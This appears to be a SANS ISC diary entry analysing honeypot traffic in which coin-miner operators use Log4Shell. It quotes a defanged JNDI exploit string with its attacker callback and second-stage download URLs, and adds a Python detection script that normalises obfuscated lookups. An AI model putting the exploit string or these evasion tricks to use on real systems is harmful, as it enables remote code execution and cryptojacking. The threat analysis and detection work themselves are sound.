Last Updated: 2021-12-13 01:31:37 UTC
by Renato Marinho (Version: 1)
Analyzing the ISC honeypots' requests, I found that coin miner operators have just added Log4Shell to their arsenal.
The request that hit our honeypot tries to make a vulnerable log4j instance perform the lookup 'jndi:ldap://45[.]83.193.150:1389/Exploit'. This makes log4j load and instantiate a malicious payload hosted at 'http://31[.]220.58.29/Exploit.class'.
I found the payload address by performing the JNDI lookup myself, just as log4j does, and then reading the class name and codebase from the returned reference object. To do so, I created a simple tool that is available on GitHub.
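The two steps just described (pull the JNDI lookup string out of the honeypot request, then derive the class URL from the naming reference the LDAP server returns) are shown below as an added Python example. It is not the GitHub tool mentioned above and does not contact any server: the request line and the LDAP entry are constructed samples built from the addresses quoted in this diary, and the entry follows the attribute layout of a javaNamingReference (javaFactory loaded from javaCodeBase, which is the assumption the URL derivation rests on). It goes a little beyond the diary by first undoing the common `${lower:x}` and `${x:-y}` substitutions that are used to disguise the `jndi` keyword, so that detection on logs still fires.

```python
import re
from urllib.parse import urlsplit

# Constructed sample request of the kind the honeypot received; the callback
# address is the one quoted in the diary, kept in defanged form.
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "User-Agent: ${jndi:ldap://45[.]83.193.150:1389/Exploit}\r\n"
)

# Constructed LDAP search result shaped like a JNDI naming reference; values
# mirror the payload location given in the diary.
SAMPLE_LDAP_ENTRY = {
    "objectClass": ["top", "javaNamingReference"],
    "javaClassName": ["foo"],
    "javaFactory": ["Exploit"],
    "javaCodeBase": ["http://31[.]220.58.29/"],
}

# ${lower:j} / ${upper:j} resolve to the single character; ${anything:-j}
# resolves to the default value after ':-'. Both are used to hide "jndi".
_SUBST_LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
_SUBST_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")

JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|http)://(?P<rest>[^}]+)\}",
    re.IGNORECASE,
)


def refang(text):
    """Turn '45[.]83.193.150' back into a parseable address."""
    return text.replace("[.]", ".")


def normalize_lookup(text):
    """Repeatedly collapse nested substitutions until the string is stable."""
    previous = None
    while previous != text:
        previous = text
        text = _SUBST_LOWER_UPPER.sub(lambda m: m.group(1), text)
        text = _SUBST_DEFAULT.sub(lambda m: m.group(1), text)
    return text


def extract_jndi_lookups(text):
    """Return (scheme, host, port, name) for every JNDI lookup found in text."""
    found = []
    for m in JNDI_RE.finditer(normalize_lookup(refang(text))):
        url = "%s://%s" % (m.group("scheme").lower(), m.group("rest"))
        try:
            parts = urlsplit(url)
            found.append((parts.scheme, parts.hostname, parts.port,
                          parts.path.lstrip("/")))
        except ValueError:
            # Malformed netloc (e.g. bad port); keep the raw match for triage.
            found.append((m.group("scheme").lower(), m.group("rest"), None, ""))
    return found


def payload_url_from_reference(entry):
    """Derive the class URL that JNDI would fetch for a naming reference.

    Assumption (stated in the lead-in): the object factory named in
    javaFactory is loaded from the location in javaCodeBase.
    """
    if "javaNamingReference" not in entry.get("objectClass", []):
        return None
    codebase = refang(entry.get("javaCodeBase", [""])[0])
    factory = entry.get("javaFactory", [""])[0]
    if not codebase or not factory:
        return None
    if not codebase.endswith("/"):
        codebase += "/"
    return codebase + factory.replace(".", "/") + ".class"


if __name__ == "__main__":
    for hit in extract_jndi_lookups(SAMPLE_REQUEST):
        print("JNDI callback:", hit)
    print("second stage:", payload_url_from_reference(SAMPLE_LDAP_ENTRY))
```

Feeding web server or proxy logs through `extract_jndi_lookups` gives the callback host and port to block or hunt for; `payload_url_from_reference` is the offline counterpart of the lookup step, useful when the LDAP response has already been captured rather than fetched live.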
After decompiling the malicious class using fernflower, I could see the following code.
Depending on the targeted operating system, the code downloads and executes a second stage hosted at different locations.
At http://172[.]105.241.146:80/wp-content/themes/twentysixteen/s.cmd, which is loaded in the Windows case, there is a PowerShell script that downloads and executes a coin miner, as seen below.
For non-Windows operating systems, the malicious class downloads and executes an ELF binary hosted at http://18[.]228.7.109/.log/log. Although I suspect it is also a coin miner, the ELF file is yet to be analyzed.
Files (MD5 and SHA256 hashes)